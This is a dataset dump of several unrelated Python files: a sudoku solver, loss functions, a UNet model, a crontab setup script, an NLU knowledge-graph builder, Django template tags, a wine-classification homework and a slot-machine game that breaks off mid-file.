","sub_path":"Tabuleiro1.1.py","file_name":"Tabuleiro1.1.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148794036","text":"from algorithms import BruteForce, CombinedSolver, SmartSolver\nfrom settings import Settings\nimport time\nimport typing\n\n\n# Examples. Take user input by uncomment line 148 and commend line 149 to take input from user\n# Easy\n#sample = \"000004670009200801007613049050100284010000396496800050300061020085400060900078000\"\n# Hard. Slowly solved by bruteforce but fast by smarter alghorithm\nsample = \"000801000000000043500000000000070800000000100020030000600000075003400000000200600\"\n# Hard, designed against bruteforce. Very slow solution using bruteforce but fast solved using smarter algorithm\n#sample = \"000000000000003085001020000000507000004000100090000000500000073002010000000040009\"\n\n\nclass Game:\n \"\"\"stores board state and methods\n board: (nested list of rows) Representation of the board. 
0 = empty cell\n [[0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8],\n [0, 1, 2, 3, 4, 5, 6, 7, 8]]\"\"\"\n\n board: typing.List[typing.List[int]] = []\n\n def __init__(self, input_sequence: typing.AnyStr):\n \"\"\"Transformation of input string into list of int\"\"\"\n position_counter = 0\n\n for _ in range(Settings.row_number):\n row = []\n for _ in range(Settings.column_number):\n row.append(int(input_sequence[position_counter]))\n position_counter += 1\n self.board.append(row)\n\n def draw(self):\n \"\"\"Draw current state of board in human-friendly form\"\"\"\n\n row_counter = 0\n column_counter = 0\n\n print(\"-\" * Settings.screen_width)\n\n for row in self.board:\n print(\"| \", end=\"\")\n for cell in row:\n if cell != 0:\n print(cell, end=\" \")\n else:\n print(\" \", end=\" \")\n row_counter += 1\n if row_counter == 3:\n print(\"| \", end=\"\")\n row_counter = 0\n column_counter += 1\n if column_counter == 3:\n print(\"\\n\", \"-\" * Settings.screen_width, sep=\"\")\n column_counter = 0\n else:\n print()\n\n def brutal_solution(self):\n \"\"\"Bruteforce with backtracking. Check every state of board until find correct one\"\"\"\n solver = BruteForce(self.board)\n self.board = solver.solve()\n\n def less_brutal_solution(self):\n \"\"\"Fill part of the board (or whole in easier puzzles) using James Crook algorithm and fill rest using\n bruteforce\"\"\"\n solver = CombinedSolver(self.board)\n self.board = solver.solve()\n\n def smart_solution(self):\n \"\"\"Implementation of James Crook algorithm.\"\"\"\n solver = SmartSolver(self.board)\n self.board = solver.solve()\n\n\ndef input_from_console() -> typing.AnyStr:\n \"\"\"Takes input from user using console and check if it is correct.\n :returns: board sequence (string).\"\"\"\n board_sequence = \"\"\n line_counter = 1\n print(\"Insert board state (from left to right, without space, 'Enter' after every line)\\nif cell is empty type '0'\")\n while True:\n line = input(f\"line {line_counter}: \")\n\n if len(line) != 9:\n print(f\"line must contain 9 digits. Input line {line_counter} again.\\nNote: type '0' for empty cell\")\n continue\n elif line.isdecimal() is False:\n print(f\"line must contain only digits. Input line {line_counter} again.\\nNote: type '0' for empty cell\")\n continue\n else:\n line_counter += 1\n board_sequence += line\n\n if line_counter == 10:\n if input_validation(board_sequence) is True:\n return board_sequence\n else:\n print(\"Input is not valid. Try again.\")\n line_counter = 1\n\n\ndef input_validation(board_sequence: typing.AnyStr) -> bool:\n \"\"\"Validation of user input. Be aware that function checks only repetition of number in rows, columns and squares\n not the solvability of puzzle. 
Return True if input is valid, else return False\n :param board_sequence: Inserted interpretation of board\n :return: True if sequence is correct otherwise False\"\"\"\n\n counter_line = 0\n counter_col = 0\n\n for _ in range(Settings.row_number):\n line = set()\n column = set()\n for _ in range(Settings.column_number):\n\n # line check\n if board_sequence[counter_line] != \"0\":\n if board_sequence[counter_line] not in line:\n line.add(board_sequence[counter_line])\n else:\n return False\n counter_line += 1\n\n # column check\n if board_sequence[counter_col] != \"0\":\n if board_sequence[counter_col] not in column:\n column.add(board_sequence[counter_col])\n else:\n return False\n counter_col += 9\n counter_col -= 80\n return True\n\n\ndef start_here():\n \"\"\"Start program\"\"\"\n # input from console or sample. Uncomment line 148 and commend line 149 to take input from user\n # board_sequence = input_from_console()\n board_sequence = sample\n\n # initiation of Board instance and draw initial state\n game = Game(board_sequence)\n game.draw()\n\n # show menu and select algorithm\n while True:\n x = input(\"1. Brutal solution\\n2. Less brutal solution\\n3. Smart solution\\nChoose solution: \")\n\n if x != \"1\" and x != \"2\" and x != \"3\":\n print(\"unknown command. Try again\\n\")\n else:\n break\n\n print(\"Working...\")\n\n if x == \"1\":\n start = time.time()\n game.brutal_solution()\n elif x == \"2\":\n start = time.time()\n game.less_brutal_solution()\n elif x == \"3\":\n start = time.time()\n game.smart_solution()\n\n stop = time.time()\n\n game.draw()\n print(f\"complete in {stop - start} sec\")\n\n\nif __name__ == \"__main__\":\n start_here()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464443575","text":"import numpy as np\n\n\ndef mean_squared_error(y, t):\n batch_size = y.shape[0]\n diff = y - t\n return 0.5 * np.sum(diff**2) / batch_size\n\ndef huber_loss(y, t, delta):\n a = np.abs(y - t)\n loss = np.where(a <= delta, 0.5 * a**2, delta * (a - 0.5 * delta))\n return loss\n\ndef cross_entropy_error(y, t, eps=1e-7):\n if y.ndim == 1:\n t = t.reshape(1, t.size)\n y = y.reshape(1, y.size)\n if t.size == y.size:\n t = t.argmax(axis=1)\n batch_size = y.shape[0]\n return -np.sum(np.log(y[np.arange(batch_size), t] + eps)) / batch_size","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"304470310","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .utils import weights_init\n\n\ndef define_U(device, in_channel=1, out_channel=3):\n u = UNet(in_channel=in_channel, out_channel=out_channel).to(device)\n u.apply(weights_init)\n return u\n\n\nclass Down(nn.Module):\n def __init__(self, in_nc, out_nc, ks, s, p, leaky=False):\n super(Down, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv2d(in_nc, out_nc, ks, s, p),\n nn.BatchNorm2d(out_nc),\n nn.LeakyReLU(0.2) if leaky else nn.ReLU()\n )\n\n def forward(self, x):\n return self.layer(x)\n\n\ndef InConv(img_nc, out_nc, leaky=False):\n return Down(img_nc, out_nc, 3, 1, 1, leaky)\n\n\ndef Down3x3(in_nc, out_nc, leaky=False):\n return Down(in_nc, out_nc, 3, 1, 1, leaky)\n\n\ndef Down4x4(in_nc, out_nc, leaky=False):\n return Down(in_nc, out_nc, 4, 2, 1, leaky)\n\n\nclass Up(nn.Module):\n def __init__(self, nc, ks1=4, 
ks2=3,\n s1=2, s2=1, p1=1, p2=1):\n super(Up, self).__init__()\n self.layer1 = nn.Sequential(\n nn.ConvTranspose2d(nc, int(nc / 2), ks1, s1, p1),\n nn.BatchNorm2d(nc // 2),\n nn.ReLU(inplace=True)\n )\n self.layer2 = nn.Sequential(\n nn.Conv2d(int(nc/2), int(nc/4), ks2, s2, p2),\n nn.BatchNorm2d(nc // 4),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x1, x2):\n # if x1.size is not equal to x2.size, padding small image.\n diff_y = x2.size()[2] - x1.size()[2]\n diff_x = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, [diff_x//2, diff_x - diff_x//2,\n diff_y//2, diff_y - diff_y//2])\n x = self.layer1(torch.cat([x2, x1], dim=1))\n return self.layer2(x)\n\n\nclass Out(nn.Module):\n\n def __init__(self, in_nc, out_nc, ks=3, s=1, p=1):\n super(Out, self).__init__()\n self.down = nn.Sequential(\n nn.Conv2d(in_nc, out_nc, ks, s, p),\n nn.BatchNorm2d(out_nc),\n nn.Tanh()\n )\n\n def forward(self, x1, x2):\n diff_y = x2.size()[2] - x1.size()[2]\n diff_x = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, [diff_x // 2, diff_x - diff_x // 2,\n diff_y // 2, diff_y - diff_y // 2])\n return self.down(torch.cat([x2, x1], dim=1))\n\n\nclass UNet(nn.Module):\n\n def __init__(self, in_channel=1, out_channel=3, ngf=32):\n super(UNet, self).__init__()\n self.in_layer = InConv(in_channel, ngf)\n self.down1 = Down4x4(ngf, ngf*2)\n self.down2 = Down3x3(ngf*2, ngf*2)\n self.down3 = Down4x4(ngf*2, ngf*4)\n self.down4 = Down3x3(ngf*4, ngf*4)\n self.down5 = Down4x4(ngf*4, ngf*8)\n self.down6 = Down3x3(ngf*8, ngf*8)\n self.down7 = Down4x4(ngf*8, ngf*16)\n self.down8 = Down3x3(ngf*16, ngf*16)\n self.up1 = Up(ngf*32)\n self.up2 = Up(ngf*16)\n self.up3 = Up(ngf*8)\n self.up4 = Up(ngf*4)\n self.out = Out(ngf*2, out_channel)\n\n def forward(self, x):\n x1 = self.in_layer(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x6 = self.down5(x5)\n x7 = self.down6(x6)\n x8 = self.down7(x7)\n x9 = self.down8(x8)\n\n x = self.up1(x8, x9)\n x = self.up2(x, x7)\n x = self.up3(x, x5)\n x = self.up4(x, x3)\n x = self.out(x, x1)\n return x\n","sub_path":"network/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"581504927","text":"import yaml\n\n\nCONFIG_FILE = 'config.yaml'\nCRONTAB_FILE = '/etc/crontabs/root'\n\n\ndef main():\n\n with open(CONFIG_FILE) as f:\n cfg = yaml.safe_load(f)\n cl_checks = cfg['craigslist']['checks']\n\n with open(CRONTAB_FILE, \"a\") as f:\n for check in cl_checks:\n f.write(f'{check[\"cron\"]} python /code/craigcheckr.py --url=\\\"{check[\"url\"]}\\\" > /proc/1/fd/1 2>/proc/1/fd/2\\n')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"setup_crontab.py","file_name":"setup_crontab.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"540674557","text":"\n\nfrom xai.brain.wordbase.verbs._doubt import _DOUBT\n\n#calss header\nclass _DOUBTS(_DOUBT, ):\n\tdef __init__(self,): \n\t\t_DOUBT.__init__(self)\n\t\tself.name = \"DOUBTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"doubt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_doubts.py","file_name":"_doubts.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"223027871","text":"import io\nimport json\nfrom snips_nlu import SnipsNLUEngine\nfrom snips_nlu.default_configs import 
CONFIG_EN\n\ndef main():\n\t#kg from unstructured data\n\tf = open('unstructured_text_book_input_chickpea.txt')\n\tlines = f.readlines()\n\tinput_lines = []\n\tfor line in lines:\n\t\t# print('here1: '+str(line))\n\t\twords = line.split(' ')\n\t\tin_line = []\n\t\tfor word in words:\n\t\t\tif word=='and' or word==',' or word=='but':\n\t\t\t\tinput_lines.append(in_line)\n\t\t\t\tin_line = []\n\t\t\t\tin_line.append('Chickpea')\n\t\t\telse:\n\t\t\t\tin_line.append(word)\n\t\tif in_line!=[]:\n\t\t\tinput_lines.append(in_line)\n\tf.close()\n\tf = open('input.txt','w+')\n\tfor line in input_lines:\n\t\t# print('here2: '+str(line))\n\t\tfor word in line:\n\t\t\tf.write(word+' ')\n\t\tf.write('\\n')\n\tf.close()\n\n\tengine = SnipsNLUEngine(config = CONFIG_EN)\n\twith io.open(\"dataset1.json\") as f:\n\t\tdataset = json.load(f)\n\n\tengine.fit(dataset)\n\t_dict = {}\n\t_dict['chickpea']={}\n\tin_file = open('input.txt', 'r')\n\tlines = in_file.readlines()\n\tfor line in lines:\n\t\tif len(line)<=2:\n\t\t\tprint('hi')\n\t\t\tcontinue\n\t\tprint('line: '+str(line))\n\t\tparsing = engine.parse(line)\n\t\tprint('parsing results: ')\n\t\tprint(parsing)\n\t\trelation = parsing['intent']['intentName']\n\t\tprob = float(parsing['intent']['probability'])\n\t\tprint('prob: '+str(prob))\n\t\tprint('relation: '+str(relation))\n\t\tif relation!='None' and prob>=0.3:\n\t\t\t# print('here')\n\t\t\tslots = parsing['slots']\n\t\t\tfor slot in slots:\n\t\t\t\tif slot['entity']!='crop':\n\t\t\t\t\tif relation not in _dict['chickpea'].keys():\n\t\t\t\t\t\t# print('case1: ')\n\t\t\t\t\t\t# print('relation: '+str(relation))\n\t\t\t\t\t\t_dict['chickpea'][relation] = slot['rawValue']\n\t\t\t\t\telse:\n\t\t\t\t\t\t# print('case2: ')\n\t\t\t\t\t\t# print('relation: '+str(relation))\n\t\t\t\t\t\t_dict['chickpea'][relation] += (','+slot['rawValue']) \n\tprint('_dict:-')\n\tprint(_dict)\n\t#_dict_json = json.dumps(_dict)\n\tin_file.close()\n\twith open(\"output_kg_chickpea.json\", \"w\") as outfile:\n\t\tjson.dump(_dict, outfile)\n\twith open('output_kg_chickpea.json', 'r') as openfile:\n\t\tjson_object = json.load(openfile)\n\tprint(json_object) \n\t#reading and including structured data on disease management in knowledge graph\n\t# f = open('structured_chickpea_disease.txt','r')\n\t# lines = f.readlines()\n\t# f.close()\n\t# diseases_list = []\n\t# flag=0\n\t# diseaseName =''\n\t# dict_2_insert={}\n\t# cnt =0\n\t# for line in lines:\n\t# \tline = line[:-1]\n\t# \tif line=='##':\n\t# \t\tcnt=1\n\t# \telse:\n\t# \t\tif cnt==1:\n\t# \t\t\tcnt = 2\n\t# \t\t\tif len(dict_2_insert.keys())>0:\n\t# \t\t\t\tdiseases_list.append(dict_2_insert)\n\t# \t\t\tdiseaseName = line\n\t# \t\t\tdict_2_insert[diseaseName] = {}\n\t# \t\telif cnt==2:\n\t# \t\t\tdict_2_insert[diseaseName]['symptom'] = line\n\t# \t\t\tcnt=3\n\t# \t\telse:\n\t# \t\t\tif 'management' not in dict_2_insert[diseaseName].keys():\n\t# \t\t\t\tdict_2_insert[diseaseName]['management'] = line\n\t# \t\t\telse:\n\t# \t\t\t\tdict_2_insert[diseaseName]['management'] += (':: '+line)\n\t# print(diseases_list)\n\t# json_object['diseases']=diseases_list\n\t# with open(\"output_kg_chickpea.json\", \"w+\") as outfile:\n\t# \tjson.dump(json_object, outfile)\n\t#reading and including structured data on disease management in knowledge graph\n\t# with open('output_kg_chickpea.json', 'r') as openfile:\n\t# \tjson_object = json.load(openfile)\n\t# print(json_object) \n\t# f = open('structured_chickpea_post_prod.txt','r')\n\t# lines = f.readlines()\n\t# f.close()\n\t# line = 
lines[0][:-1]\n\t# json_object['postProductionTechnique'] = line\n\t# with open(\"output_kg_chickpea.json\", \"w+\") as outfile:\n\t# \tjson.dump(json_object, outfile)\nif __name__ == '__main__':\n\tmain()","sub_path":"Knowledge Graph Creation/Intent-Identification-Slot-Tagging-Snips/create_km_chickpea.py","file_name":"create_km_chickpea.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"18717026","text":"import logging\n\nfrom django import template\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\nfrom django.utils.module_loading import import_string\nfrom django.utils.safestring import SafeString\n\nfrom cms.contexts.utils import handle_faulty_templates\nfrom cms.pages.models import Category\nfrom cms.publications.models import Publication, PublicationContext\n\n\nlogger = logging.getLogger(__name__)\nregister = template.Library()\n\n\ndef _get_pub_qparams(context, webpath, section = None, in_evidence=False,\n categories_csv=None, tags_csv=None):\n now = timezone.localtime()\n query_params = dict(webpath=context['webpath'],\n is_active=True,\n publication__is_active=True,\n publication__date_start__lte=now,\n publication__state=\"published\")\n if section:\n query_params['section'] = section\n if in_evidence:\n query_params['in_evidence_start__lte'] = now\n query_params['in_evidence_start__gt'] = now\n if categories_csv:\n cats = [i.strip() for i in categories_csv.split(',')]\n query_params['publication__category__name__in'] = cats\n if tags_csv:\n tags = [i.strip() for i in tags_csv.split(',')]\n query_params['publication__tags__name__in'] = tags\n\n return query_params\n\n\n@register.simple_tag(takes_context=True)\ndef load_publication(context, template, publication_id):\n _func_name = 'load_publication'\n _log_msg = f'Template Tag {_func_name}'\n\n request = context['request']\n webpath = context['webpath']\n language = getattr(request, 'LANGUAGE_CODE', '')\n\n pub = Publication.objects.filter(pk=publication_id,\n is_active=True).\\\n first()\n\n if not pub:\n _msg = '{} cannot find publication id {}'.format(log_msg,\n publication_id)\n logger.error(_msg)\n return SafeString('')\n\n pub.translate_as(lang=language)\n data = {'publication': pub, 'webpath': webpath}\n return handle_faulty_templates(template, data, name=_func_name)\n\n\n@register.simple_tag(takes_context=True)\ndef load_publications_preview(context, template,\n section = None,\n number=5,\n in_evidence=False,\n categories_csv=None, tags_csv=None):\n request = context['request']\n webpath = context['webpath']\n query_params = _get_pub_qparams(context = context ,\n webpath=webpath,\n section = section,\n in_evidence = in_evidence,\n categories_csv = categories_csv,\n tags_csv = tags_csv)\n\n pub_in_context = PublicationContext.objects.\\\n filter(**query_params).\\\n order_by('order')[0:number]\n\n if not pub_in_context: return SafeString('')\n\n # i18n\n language = getattr(request, 'LANGUAGE_CODE', '')\n for i in pub_in_context:\n i.publication.translate_as(lang=language)\n\n data = {'publications': pub_in_context}\n return handle_faulty_templates(template, data,\n name='load_publications_preview')\n","sub_path":"src/cms/publications/templatetags/unicms_publications.py","file_name":"unicms_publications.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
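# Illustrative aside (not a corpus record): the script in the next record repeats the same
# scale -> reduce -> fit -> score boilerplate once per (reducer, classifier) pair. A minimal
# condensed sketch of that experiment, assuming sklearn's bundled copy of the same UCI wine
# data in place of the remote CSV the record downloads:
from itertools import product

from sklearn.datasets import load_wine
from sklearn.decomposition import PCA, KernelPCA
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC

X, y = load_wine(return_X_y=True)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, stratify=y,
                                          random_state=42)
reducers = {'pca': PCA(n_components=2),
            'lda': LDA(n_components=2),
            'kpca': KernelPCA(n_components=2, kernel='rbf', gamma=0.5)}
models = {'lr': LogisticRegression(max_iter=1000),
          'svm': LinearSVC(max_iter=10000)}
for (rname, red), (mname, clf) in product(reducers.items(), models.items()):
    # each pipeline standardizes, projects to 2 components, then fits the classifier
    pipe = make_pipeline(StandardScaler(), red, clf).fit(X_tr, y_tr)
    print('{}+{}: train={:.3f} test={:.3f}'.format(
        rname, mname, pipe.score(X_tr, y_tr), pipe.score(X_te, y_te)))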
+{"seq_id":"254858892","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 30 10:34:30 2018\r\n\r\n@author: yliu2\r\n\"\"\"\r\n\r\n\r\n# *Python Machine Learning 2nd Edition* by [Sebastian Raschka](https://sebastianraschka.com), Packt Publishing Ltd. 2017\r\n# \r\n# Code Repository: https://github.com/rasbt/python-machine-learning-book-2nd-edition\r\n# \r\n# Code License: [MIT License](https://github.com/rasbt/python-machine-learning-book-2nd-edition/blob/master/LICENSE.txt)\r\n\r\n# Code edited by Yi Liu. \r\n\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nfrom scipy.spatial.distance import pdist, squareform\r\nfrom scipy import exp\r\nfrom scipy.linalg import eigh\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.datasets import make_circles\r\nfrom sklearn.decomposition import KernelPCA\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndf_wine = pd.read_csv('https://archive.ics.uci.edu/ml/'\r\n 'machine-learning-databases/wine/wine.data',\r\n header=None)\r\n\r\ndf_wine.columns = ['Class label', 'Alcohol', 'Malic acid', 'Ash',\r\n 'Alcalinity of ash', 'Magnesium', 'Total phenols',\r\n 'Flavanoids', 'Nonflavanoid phenols', 'Proanthocyanins',\r\n 'Color intensity', 'Hue',\r\n 'OD280/OD315 of diluted wines', 'Proline']\r\n\r\ndf_wine.head()\r\n\r\n\r\n\r\ncols = ['Alcohol', 'Malic acid', 'Ash',\r\n 'Alcalinity of ash', 'Magnesium', 'Total phenols',\r\n 'Flavanoids', 'Nonflavanoid phenols', 'Proanthocyanins',\r\n 'Color intensity', 'Proline']\r\n\r\nsns.pairplot(df_wine[cols], size=2.5)\r\nplt.tight_layout()\r\n# plt.savefig('images/10_03.png', dpi=300)\r\nplt.show()\r\n\r\n\r\n\r\n\r\nX, y = df_wine.iloc[:, 1:], df_wine.iloc[:, 0]\r\n\r\nX_train,X_test,y_train,y_test=train_test_split(X.values,y.values,test_size=0.2,stratify=y,random_state=42)\r\n\r\n\r\n#standard\r\nsc = StandardScaler()\r\nX_train_std = sc.fit_transform(X_train)\r\nX_test_std = sc.transform(X_test)\r\n\r\n\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_std, y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm = svm.fit(X_train_std, y_train)\r\n\r\n\r\n\r\ny_train_pred=lr.predict(X_train_std)\r\ny_test_pred=lr.predict(X_test_std)\r\nprint(\"lr, std, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, std, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\ny_train_pred=svm.predict(X_train_std)\r\ny_test_pred=svm.predict(X_test_std)\r\nprint(\"svm, std, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, std, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n#PCA\r\npca = PCA(n_components=2)\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nX_test_pca = pca.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_pca, y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm = svm.fit(X_train_pca, y_train)\r\n\r\n\r\ny_train_pred=lr.predict(X_train_pca)\r\ny_test_pred=lr.predict(X_test_pca)\r\nprint(\"lr, PCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, PCA, test:\", 
metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_pca)\r\ny_test_pred=svm.predict(X_test_pca)\r\nprint(\"svm, PCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, PCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n\r\n#LDA\r\n\r\nlda = LDA(n_components=2)\r\n\r\nX_train_lda = lda.fit_transform(X_train_std,y_train)\r\nX_test_lda = lda.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr.fit(X_train_lda,y_train)\r\n\r\nsvm = LinearSVC()\r\nsvm.fit(X_train_lda,y_train)\r\n\r\n\r\ny_train_pred=lr.predict(X_train_lda)\r\ny_test_pred=lr.predict(X_test_lda)\r\nprint(\"lr, LDA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, LDA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_lda)\r\ny_test_pred=svm.predict(X_test_lda)\r\nprint(\"svm, LDA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, LDA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\n\r\n#kPCA\r\n\r\nscikit_kpca = KernelPCA(n_components=2, kernel='rbf', gamma=0.5)\r\ntransformed = scikit_kpca.fit_transform(sc.fit_transform(X.values))\r\n\r\nX_train_kpca = scikit_kpca.fit_transform(X_train_std,y_train)\r\nX_test_kpca = scikit_kpca.transform(X_test_std)\r\n\r\n\r\nlr = LogisticRegression()\r\nlr.fit(X_train_kpca,y_train);\r\n\r\n\r\nsvm = LinearSVC()\r\nsvm.fit(X_train_kpca,y_train);\r\n\r\n\r\n\r\ny_train_pred=lr.predict(X_train_kpca)\r\ny_test_pred=lr.predict(X_test_kpca)\r\nprint(\"lr, kPCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"lr, kPCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\ny_train_pred=svm.predict(X_train_kpca)\r\ny_test_pred=svm.predict(X_test_kpca)\r\nprint(\"svm, kPCA, train:\", metrics.accuracy_score(y_train,y_train_pred),\"svm, kPCA, test:\", metrics.accuracy_score(y_test,y_test_pred))\r\n\r\n\r\n\r\nprint(\"My name is Yi Liu\")\r\nprint(\"My NetID is: yiliu16\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")","sub_path":"IE598_F18_HW5/Liu,Yi_IE598HW5.py","file_name":"Liu,Yi_IE598HW5.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475583800","text":"from db import Db\nimport os\nimport roslib\n\nclass CommandDb(Db):\n def __init__(self, db_filename):\n Db.__init__(self, db_filename)\n corpus_file = os.path.join(\n roslib.packages.get_pkg_dir('robot_eup'),\n 'speech/', '') + \"commands.corpus\"\n f = open(corpus_file, 'r')\n self._commands = f.readlines()\n f.close()\n for c in self._commands:\n command = c.rstrip()\n self.set(command)\n\n def set(self, command):\n self._db[command] = command\n","sub_path":"robot_eup/src/robot_eup/command_db.py","file_name":"command_db.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182197380","text":"import emoji\r\nfrom random import choice\r\n\r\nfaces = [emoji.emojize(':red_apple:'),\r\n emoji.emojize(':pear:'),\r\n emoji.emojize(':tangerine:')\r\n ]\r\n\r\nclass Purse:\r\n def __init__(self):\r\n self.__money = 10\r\n\r\n def debit(self, amount):\r\n self.__money -= amount\r\n\r\n def credit(self, amount):\r\n self.__money += amount\r\n\r\n def get_balance(self):\r\n return self.__money\r\nmypurse = Purse()\r\n\r\nclass Column:\r\n def __init__(self):\r\n self.face = \"\"\r\n\r\n def 
change_face(self):\r\n self.face = choice(faces)\r\n\r\n def get_face(self):\r\n return self.face\r\n\r\n\r\nclass Slot:\r\n def __init__(self):\r\n self.column1 = Column()\r\n self.column2 = Column()\r\n self.column3 = Column()\r\n self.bet = 0\r\n self.take_bet()\r\n\r\n def take_bet(self):\r\n self.bet = input(\"How much do you bet? \")\r\n if self.bet == \"N\":\r\n print(\"Thanks for playing!\")\r\n\r\n if self.bet != \"N\":\r\n try:\r\n self.bet = int(self.bet)\r\n except ValueError:\r\n self.take_bet()\r\n\r\n if self.bet < 2:\r\n print(\"Minimum bet is 2!\")\r\n self.take_bet()\r\n\r\n elif self.bet > mypurse.get_balance():\r\n print(\"You don't have enough money to make that bet! You only have:\", mypurse.get_balance())\r\n self.take_bet()\r\n else:\r\n self.pull_handle()\r\n\r\n def pull_handle(self):\r\n self.column1.change_face()\r\n self.column2.change_face()\r\n self.column3.change_face()\r\n self.show_slot()\r\n\r\n def show_slot(self):\r\n print(self.column1.get_face(), \" \", self.column2.get_face(), \" \", self.column3.get_face())\r\n self.score_slot()\r\n\r\n def score_slot(self):\r\n if self.column1.get_face() == self.column2.get_face() and self.column2.get_face() == self.column3.get_face():\r\n mypurse.credit(self.bet*1.5)\r\n print(\"You score\", self.bet*1.5, \"You have:\", mypurse.get_balance())\r\n self.take_bet()\r\n\r\n elif self.column1.get_face() == self.column2.get_face() or self.column1.get_face() == self.column3.get_face() or self.column2.get_face() == self.column3.get_face():\r\n mypurse.credit(self.bet)\r\n print(\"You score\", self.bet, \"You have:\", mypurse.get_balance())\r\n self.take_bet()\r\n\r\n else:\r\n mypurse.debit(self.bet)\r\n print(\"You score\", 0, \"You have:\", mypurse.get_balance())\r\n if mypurse.get_balance() < 2:\r\n print(\"You don't have enough money for another bet! 
